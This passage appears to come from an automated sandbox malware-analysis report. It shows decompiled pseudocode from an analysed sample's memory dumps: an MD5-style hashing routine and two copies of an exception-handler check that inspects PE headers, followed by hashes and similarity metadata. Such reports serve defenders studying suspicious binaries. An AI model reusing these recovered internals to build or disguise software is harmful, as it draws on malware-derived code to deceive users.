                            				signed int _t742;
                            				signed int _t744;
                            				signed int _t746;
                            				signed int _t748;
                            
                            				_t226 = _a4;
                            				_t348 = __ecx + 2;
                            				_t401 =  &_v76;
                            				_t682 = 0x10;
                            				do {
                            					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                            					_t401 =  &(_t401[1]);
                            					_t348 =  &(_t348[4]);
                            					_t682 = _t682 - 1;
                            				} while (_t682 != 0);
                            				_t6 = _t226 + 4; // 0x14eb3fc3
                            				_t683 =  *_t6;
                            				_t7 = _t226 + 8; // 0x8d08458b
                            				_t402 =  *_t7;
                            				_t8 = _t226 + 0xc; // 0x56c1184c
                            				_t349 =  *_t8;
                            				asm("rol eax, 0x7");
                            				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                            				asm("rol ecx, 0xc");
                            				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                            				asm("ror edx, 0xf");
                            				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                            				asm("ror esi, 0xa");
                            				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                            				_v8 = _t685;
                            				_t690 = _v8;
                            				asm("rol eax, 0x7");
                            				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                            				asm("rol ecx, 0xc");
                            				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                            				asm("ror edx, 0xf");
                            				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                            				asm("ror esi, 0xa");
                            				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                            				_v8 = _t692;
                            				_t697 = _v8;
                            				asm("rol eax, 0x7");
                            				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                            				asm("rol ecx, 0xc");
                            				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                            				asm("ror edx, 0xf");
                            				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                            				asm("ror esi, 0xa");
                            				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                            				_v8 = _t699;
                            				asm("rol eax, 0x7");
                            				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                            				asm("rol ecx, 0xc");
                            				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                            				_t508 =  !_t357;
                            				asm("ror edx, 0xf");
                            				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                            				_v12 = _t410;
                            				_v12 =  !_v12;
                            				asm("ror esi, 0xa");
                            				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                            				asm("rol eax, 0x5");
                            				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                            				asm("rol ecx, 0x9");
                            				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                            				asm("rol edx, 0xe");
                            				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                            				asm("ror esi, 0xc");
                            				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                            				asm("rol eax, 0x5");
                            				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                            				asm("rol ecx, 0x9");
                            				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                            				asm("rol edx, 0xe");
                            				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                            				asm("ror esi, 0xc");
                            				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                            				asm("rol eax, 0x5");
                            				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                            				asm("rol ecx, 0x9");
                            				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                            				asm("rol edx, 0xe");
                            				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                            				asm("ror esi, 0xc");
                            				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                            				asm("rol eax, 0x5");
                            				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                            				asm("rol ecx, 0x9");
                            				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                            				asm("rol edx, 0xe");
                            				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                            				asm("ror esi, 0xc");
                            				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                            				asm("rol eax, 0x4");
                            				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                            				asm("rol ecx, 0xb");
                            				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                            				asm("rol edx, 0x10");
                            				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                            				_t599 = _t367 ^ _t420;
                            				asm("ror esi, 0x9");
                            				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                            				asm("rol eax, 0x4");
                            				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                            				asm("rol edi, 0xb");
                            				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                            				asm("rol edx, 0x10");
                            				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                            				_t338 = _t607 ^ _t422;
                            				asm("ror ecx, 0x9");
                            				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                            				asm("rol eax, 0x4");
                            				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                            				asm("rol esi, 0xb");
                            				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                            				asm("rol edi, 0x10");
                            				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                            				_t424 = _t734 ^ _t613;
                            				asm("ror ecx, 0x9");
                            				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                            				asm("rol eax, 0x4");
                            				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                            				asm("rol edx, 0xb");
                            				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                            				asm("rol esi, 0x10");
                            				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                            				asm("ror ecx, 0x9");
                            				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                            				asm("rol eax, 0x6");
                            				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                            				asm("rol edx, 0xa");
                            				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                            				asm("rol esi, 0xf");
                            				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                            				asm("ror ecx, 0xb");
                            				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                            				asm("rol eax, 0x6");
                            				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                            				asm("rol edx, 0xa");
                            				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                            				asm("rol esi, 0xf");
                            				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                            				asm("ror ecx, 0xb");
                            				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                            				asm("rol eax, 0x6");
                            				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                            				asm("rol edx, 0xa");
                            				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                            				asm("rol esi, 0xf");
                            				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                            				asm("ror edi, 0xb");
                            				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                            				asm("rol eax, 0x6");
                            				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                            				asm("rol edx, 0xa");
                            				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                            				_t400 = _a4;
                            				asm("rol esi, 0xf");
                            				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                            				 *_t400 =  *_t400 + _t259;
                            				asm("ror eax, 0xb");
                            				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                            				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                            				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                            				return memset( &_v76, 0, 0x40);
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: 50e1001d6c2c4e3c59974a9fb3ff68b46dee939a17525b2316b9db9958cb51ed
                            • Instruction ID: 592bc3e876085523b54a297b34af8f1d801ae9ea4169e4f9b33adb3aa7aedfb7
                            • Opcode Fuzzy Hash: 50e1001d6c2c4e3c59974a9fb3ff68b46dee939a17525b2316b9db9958cb51ed
                            • Instruction Fuzzy Hash: AC22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E100022E5(long _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				short* _v32;
                            				void _v36;
                            				void* _t57;
                            				signed int _t58;
                            				signed int _t61;
                            				signed int _t62;
                            				void* _t63;
                            				signed int* _t68;
                            				intOrPtr* _t69;
                            				intOrPtr* _t71;
                            				intOrPtr _t72;
                            				intOrPtr _t75;
                            				void* _t76;
                            				signed int _t77;
                            				void* _t78;
                            				void _t80;
                            				signed int _t81;
                            				signed int _t84;
                            				signed int _t86;
                            				short* _t87;
                            				void* _t89;
                            				signed int* _t90;
                            				long _t91;
                            				signed int _t93;
                            				signed int _t94;
                            				signed int _t100;
                            				signed int _t102;
                            				void* _t104;
                            				long _t108;
                            				signed int _t110;
                            
                            				_t108 = _a4;
                            				_t76 =  *(_t108 + 8);
                            				if((_t76 & 0x00000003) != 0) {
                            					L3:
                            					return 0;
                            				}
                            				_a4 =  *[fs:0x4];
                            				_v8 =  *[fs:0x8];
                            				if(_t76 < _v8 || _t76 >= _a4) {
                            					_t102 =  *(_t108 + 0xc);
                            					__eflags = _t102 - 0xffffffff;
                            					if(_t102 != 0xffffffff) {
                            						_t91 = 0;
                            						__eflags = 0;
                            						_a4 = 0;
                            						_t57 = _t76;
                            						do {
                            							_t80 =  *_t57;
                            							__eflags = _t80 - 0xffffffff;
                            							if(_t80 == 0xffffffff) {
                            								goto L9;
                            							}
                            							__eflags = _t80 - _t91;
                            							if(_t80 >= _t91) {
                            								L20:
                            								_t63 = 0;
                            								L60:
                            								return _t63;
                            							}
                            							L9:
                            							__eflags =  *(_t57 + 4);
                            							if( *(_t57 + 4) != 0) {
                            								_t12 =  &_a4;
                            								 *_t12 = _a4 + 1;
                            								__eflags =  *_t12;
                            							}
                            							_t91 = _t91 + 1;
                            							_t57 = _t57 + 0xc;
                            							__eflags = _t91 - _t102;
                            						} while (_t91 <= _t102);
                            						__eflags = _a4;
                            						if(_a4 == 0) {
                            							L15:
                            							_t81 =  *0x10004178;
                            							_t110 = _t76 & 0xfffff000;
                            							_t58 = 0;
                            							__eflags = _t81;
                            							if(_t81 <= 0) {
                            								L18:
                            								_t104 = _t102 | 0xffffffff;
                            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                            								__eflags = _t61;
                            								if(_t61 < 0) {
                            									_t62 = 0;
                            									__eflags = 0;
                            								} else {
                            									_t62 = _a4;
                            								}
                            								__eflags = _t62;
                            								if(_t62 == 0) {
                            									L59:
                            									_t63 = _t104;
                            									goto L60;
                            								} else {
                            									__eflags = _v12 - 0x1000000;
                            									if(_v12 != 0x1000000) {
                            										goto L59;
                            									}
                            									__eflags = _v16 & 0x000000cc;
                            									if((_v16 & 0x000000cc) == 0) {
                            										L46:
                            										_t63 = 1;
                            										 *0x100041c0 = 1;
                            										__eflags =  *0x100041c0;
                            										if( *0x100041c0 != 0) {
                            											goto L60;
                            										}
                            										_t84 =  *0x10004178;
                            										__eflags = _t84;
                            										_t93 = _t84;
                            										if(_t84 <= 0) {
                            											L51:
                            											__eflags = _t93;
                            											if(_t93 != 0) {
                            												L58:
                            												 *0x100041c0 = 0;
                            												goto L5;
                            											}
                            											_t77 = 0xf;
                            											__eflags = _t84 - _t77;
                            											if(_t84 <= _t77) {
                            												_t77 = _t84;
                            											}
                            											_t94 = 0;
                            											__eflags = _t77;
                            											if(_t77 < 0) {
                            												L56:
                            												__eflags = _t84 - 0x10;
                            												if(_t84 < 0x10) {
                            													_t86 = _t84 + 1;
                            													__eflags = _t86;
                            													 *0x10004178 = _t86;
                            												}
                            												goto L58;
                            											} else {
                            												do {
                            													_t68 = 0x10004180 + _t94 * 4;
                            													_t94 = _t94 + 1;
                            													__eflags = _t94 - _t77;
                            													 *_t68 = _t110;
                            													_t110 =  *_t68;
                            												} while (_t94 <= _t77);
                            												goto L56;
                            											}
                            										}
                            										_t69 = 0x1000417c + _t84 * 4;
                            										while(1) {
                            											__eflags =  *_t69 - _t110;
                            											if( *_t69 == _t110) {
                            												goto L51;
                            											}
                            											_t93 = _t93 - 1;
                            											_t69 = _t69 - 4;
                            											__eflags = _t93;
                            											if(_t93 > 0) {
                            												continue;
                            											}
                            											goto L51;
                            										}
                            										goto L51;
                            									}
                            									_t87 = _v32;
                            									__eflags =  *_t87 - 0x5a4d;
                            									if( *_t87 != 0x5a4d) {
                            										goto L59;
                            									}
                            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                            									__eflags =  *_t71 - 0x4550;
                            									if( *_t71 != 0x4550) {
                            										goto L59;
                            									}
                            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                            										goto L59;
                            									}
                            									_t78 = _t76 - _t87;
                            									__eflags =  *((short*)(_t71 + 6));
                            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                            									if( *((short*)(_t71 + 6)) <= 0) {
                            										goto L59;
                            									}
                            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                            									__eflags = _t78 - _t72;
                            									if(_t78 < _t72) {
                            										goto L46;
                            									}
                            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                            										goto L46;
                            									}
                            									__eflags =  *(_t89 + 0x27) & 0x00000080;
                            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                            										goto L20;
                            									}
                            									goto L46;
                            								}
                            							} else {
                            								goto L16;
                            							}
                            							while(1) {
                            								L16:
                            								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                            								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                            									break;
                            								}
                            								_t58 = _t58 + 1;
                            								__eflags = _t58 - _t81;
                            								if(_t58 < _t81) {
                            									continue;
                            								}
                            								goto L18;
                            							}
                            							__eflags = _t58;
                            							if(_t58 <= 0) {
                            								goto L5;
                            							}
                            							 *0x100041c0 = 1;
                            							__eflags =  *0x100041c0;
                            							if( *0x100041c0 != 0) {
                            								goto L5;
                            							}
                            							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                            							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                            								L32:
                            								_t100 = 0;
                            								__eflags = _t58;
                            								if(_t58 < 0) {
                            									L34:
                            									 *0x100041c0 = 0;
                            									goto L5;
                            								} else {
                            									goto L33;
                            								}
                            								do {
                            									L33:
                            									_t90 = 0x10004180 + _t100 * 4;
                            									_t100 = _t100 + 1;
                            									__eflags = _t100 - _t58;
                            									 *_t90 = _t110;
                            									_t110 =  *_t90;
                            								} while (_t100 <= _t58);
                            								goto L34;
                            							}
                            							_t58 = _t81 - 1;
                            							__eflags = _t58;
                            							if(_t58 < 0) {
                            								L28:
                            								__eflags = _t81 - 0x10;
                            								if(_t81 < 0x10) {
                            									_t81 = _t81 + 1;
                            									__eflags = _t81;
                            									 *0x10004178 = _t81;
                            								}
                            								_t58 = _t81 - 1;
                            								goto L32;
                            							} else {
                            								goto L25;
                            							}
                            							while(1) {
                            								L25:
                            								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                            								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                            									break;
                            								}
                            								_t58 = _t58 - 1;
                            								__eflags = _t58;
                            								if(_t58 >= 0) {
                            									continue;
                            								}
                            								break;
                            							}
                            							__eflags = _t58;
                            							if(__eflags >= 0) {
                            								if(__eflags == 0) {
                            									goto L34;
                            								}
                            								goto L32;
                            							}
                            							goto L28;
                            						}
                            						_t75 =  *((intOrPtr*)(_t108 - 8));
                            						__eflags = _t75 - _v8;
                            						if(_t75 < _v8) {
                            							goto L20;
                            						}
                            						__eflags = _t75 - _t108;
                            						if(_t75 >= _t108) {
                            							goto L20;
                            						}
                            						goto L15;
                            					}
                            					L5:
                            					_t63 = 1;
                            					goto L60;
                            				} else {
                            					goto L3;
                            				}
                            			}

                            APIs
                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002396
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: MemoryQueryVirtual
                            • String ID:
                            • API String ID: 2850889275-0
                            • Opcode ID: 1de5baaa245021cd83e1aca8b7c286a97892dc60720d7387bea766935d3f4ed5
                            • Instruction ID: 13b1758f272d0efd37d9baa1937ac0e4df02586ae21dd3cdc5bdf1897abd2a50
                            • Opcode Fuzzy Hash: 1de5baaa245021cd83e1aca8b7c286a97892dc60720d7387bea766935d3f4ed5
                            • Instruction Fuzzy Hash: 3561DD70A00652DFFB59CB28CCD065933E5EB853D4B228479D846C729DEB34EE82CA50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CFB2C1(long _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				short* _v32;
                            				void _v36;
                            				void* _t57;
                            				signed int _t58;
                            				signed int _t61;
                            				signed int _t62;
                            				void* _t63;
                            				signed int* _t68;
                            				intOrPtr* _t69;
                            				intOrPtr* _t71;
                            				intOrPtr _t72;
                            				intOrPtr _t75;
                            				void* _t76;
                            				signed int _t77;
                            				void* _t78;
                            				void _t80;
                            				signed int _t81;
                            				signed int _t84;
                            				signed int _t86;
                            				short* _t87;
                            				void* _t89;
                            				signed int* _t90;
                            				long _t91;
                            				signed int _t93;
                            				signed int _t94;
                            				signed int _t100;
                            				signed int _t102;
                            				void* _t104;
                            				long _t108;
                            				signed int _t110;
                            
                            				_t108 = _a4;
                            				_t76 =  *(_t108 + 8);
                            				if((_t76 & 0x00000003) != 0) {
                            					L3:
                            					return 0;
                            				}
                            				_a4 =  *[fs:0x4];
                            				_v8 =  *[fs:0x8];
                            				if(_t76 < _v8 || _t76 >= _a4) {
                            					_t102 =  *(_t108 + 0xc);
                            					__eflags = _t102 - 0xffffffff;
                            					if(_t102 != 0xffffffff) {
                            						_t91 = 0;
                            						__eflags = 0;
                            						_a4 = 0;
                            						_t57 = _t76;
                            						do {
                            							_t80 =  *_t57;
                            							__eflags = _t80 - 0xffffffff;
                            							if(_t80 == 0xffffffff) {
                            								goto L9;
                            							}
                            							__eflags = _t80 - _t91;
                            							if(_t80 >= _t91) {
                            								L20:
                            								_t63 = 0;
                            								L60:
                            								return _t63;
                            							}
                            							L9:
                            							__eflags =  *(_t57 + 4);
                            							if( *(_t57 + 4) != 0) {
                            								_t12 =  &_a4;
                            								 *_t12 = _a4 + 1;
                            								__eflags =  *_t12;
                            							}
                            							_t91 = _t91 + 1;
                            							_t57 = _t57 + 0xc;
                            							__eflags = _t91 - _t102;
                            						} while (_t91 <= _t102);
                            						__eflags = _a4;
                            						if(_a4 == 0) {
                            							L15:
                            							_t81 =  *0xcfd2d8; // 0x0
                            							_t110 = _t76 & 0xfffff000;
                            							_t58 = 0;
                            							__eflags = _t81;
                            							if(_t81 <= 0) {
                            								L18:
                            								_t104 = _t102 | 0xffffffff;
                            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                            								__eflags = _t61;
                            								if(_t61 < 0) {
                            									_t62 = 0;
                            									__eflags = 0;
                            								} else {
                            									_t62 = _a4;
                            								}
                            								__eflags = _t62;
                            								if(_t62 == 0) {
                            									L59:
                            									_t63 = _t104;
                            									goto L60;
                            								} else {
                            									__eflags = _v12 - 0x1000000;
                            									if(_v12 != 0x1000000) {
                            										goto L59;
                            									}
                            									__eflags = _v16 & 0x000000cc;
                            									if((_v16 & 0x000000cc) == 0) {
                            										L46:
                            										_t63 = 1;
                            										 *0xcfd320 = 1;
                            										__eflags =  *0xcfd320;
                            										if( *0xcfd320 != 0) {
                            											goto L60;
                            										}
                            										_t84 =  *0xcfd2d8; // 0x0
                            										__eflags = _t84;
                            										_t93 = _t84;
                            										if(_t84 <= 0) {
                            											L51:
                            											__eflags = _t93;
                            											if(_t93 != 0) {
                            												L58:
                            												 *0xcfd320 = 0;
                            												goto L5;
                            											}
                            											_t77 = 0xf;
                            											__eflags = _t84 - _t77;
                            											if(_t84 <= _t77) {
                            												_t77 = _t84;
                            											}
                            											_t94 = 0;
                            											__eflags = _t77;
                            											if(_t77 < 0) {
                            												L56:
                            												__eflags = _t84 - 0x10;
                            												if(_t84 < 0x10) {
                            													_t86 = _t84 + 1;
                            													__eflags = _t86;
                            													 *0xcfd2d8 = _t86;
                            												}
                            												goto L58;
                            											} else {
                            												do {
                            													_t68 = 0xcfd2e0 + _t94 * 4;
                            													_t94 = _t94 + 1;
                            													__eflags = _t94 - _t77;
                            													 *_t68 = _t110;
                            													_t110 =  *_t68;
                            												} while (_t94 <= _t77);
                            												goto L56;
                            											}
                            										}
                            										_t69 = 0xcfd2dc + _t84 * 4;
                            										while(1) {
                            											__eflags =  *_t69 - _t110;
                            											if( *_t69 == _t110) {
                            												goto L51;
                            											}
                            											_t93 = _t93 - 1;
                            											_t69 = _t69 - 4;
                            											__eflags = _t93;
                            											if(_t93 > 0) {
                            												continue;
                            											}
                            											goto L51;
                            										}
                            										goto L51;
                            									}
                            									_t87 = _v32;
                            									__eflags =  *_t87 - 0x5a4d;
                            									if( *_t87 != 0x5a4d) {
                            										goto L59;
                            									}
                            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                            									__eflags =  *_t71 - 0x4550;
                            									if( *_t71 != 0x4550) {
                            										goto L59;
                            									}
                            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                            										goto L59;
                            									}
                            									_t78 = _t76 - _t87;
                            									__eflags =  *((short*)(_t71 + 6));
                            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                            									if( *((short*)(_t71 + 6)) <= 0) {
                            										goto L59;
                            									}
                            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                            									__eflags = _t78 - _t72;
                            									if(_t78 < _t72) {
                            										goto L46;
                            									}
                            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                            										goto L46;
                            									}
                            									__eflags =  *(_t89 + 0x27) & 0x00000080;
                            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                            										goto L20;
                            									}
                            									goto L46;
                            								}
                            							} else {
                            								goto L16;
                            							}
                            							while(1) {
                            								L16:
                            								__eflags =  *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) - _t110;
                            								if( *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) == _t110) {
                            									break;
                            								}
                            								_t58 = _t58 + 1;
                            								__eflags = _t58 - _t81;
                            								if(_t58 < _t81) {
                            									continue;
                            								}
                            								goto L18;
                            							}
                            							__eflags = _t58;
                            							if(_t58 <= 0) {
                            								goto L5;
                            							}
                            							 *0xcfd320 = 1;
                            							__eflags =  *0xcfd320;
                            							if( *0xcfd320 != 0) {
                            								goto L5;
                            							}
                            							__eflags =  *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) - _t110;
                            							if( *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) == _t110) {
                            								L32:
                            								_t100 = 0;
                            								__eflags = _t58;
                            								if(_t58 < 0) {
                            									L34:
                            									 *0xcfd320 = 0;
                            									goto L5;
                            								} else {
                            									goto L33;
                            								}
                            								do {
                            									L33:
                            									_t90 = 0xcfd2e0 + _t100 * 4;
                            									_t100 = _t100 + 1;
                            									__eflags = _t100 - _t58;
                            									 *_t90 = _t110;
                            									_t110 =  *_t90;
                            								} while (_t100 <= _t58);
                            								goto L34;
                            							}
                            							_t25 = _t81 - 1; // -1
                            							_t58 = _t25;
                            							__eflags = _t58;
                            							if(_t58 < 0) {
                            								L28:
                            								__eflags = _t81 - 0x10;
                            								if(_t81 < 0x10) {
                            									_t81 = _t81 + 1;
                            									__eflags = _t81;
                            									 *0xcfd2d8 = _t81;
                            								}
                            								_t28 = _t81 - 1; // 0x0
                            								_t58 = _t28;
                            								goto L32;
                            							} else {
                            								goto L25;
                            							}
                            							while(1) {
                            								L25:
                            								__eflags =  *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) - _t110;
                            								if( *((intOrPtr*)(0xcfd2e0 + _t58 * 4)) == _t110) {
                            									break;
                            								}
                            								_t58 = _t58 - 1;
                            								__eflags = _t58;
                            								if(_t58 >= 0) {
                            									continue;
                            								}
                            								break;
                            							}
                            							__eflags = _t58;
                            							if(__eflags >= 0) {
                            								if(__eflags == 0) {
                            									goto L34;
                            								}
                            								goto L32;
                            							}
                            							goto L28;
                            						}
                            						_t75 =  *((intOrPtr*)(_t108 - 8));
                            						__eflags = _t75 - _v8;
                            						if(_t75 < _v8) {
                            							goto L20;
                            						}
                            						__eflags = _t75 - _t108;
                            						if(_t75 >= _t108) {
                            							goto L20;
                            						}
                            						goto L15;
                            					}
                            					L5:
                            					_t63 = 1;
                            					goto L60;
                            				} else {
                            					goto L3;
                            				}
                            			}

                            APIs
                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00CFB372
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: MemoryQueryVirtual
                            • String ID:
                            • API String ID: 2850889275-0
                            • Opcode ID: fd9099a50fa455978c527e373530f8e736734661954759eb43fea4e81f39fb81
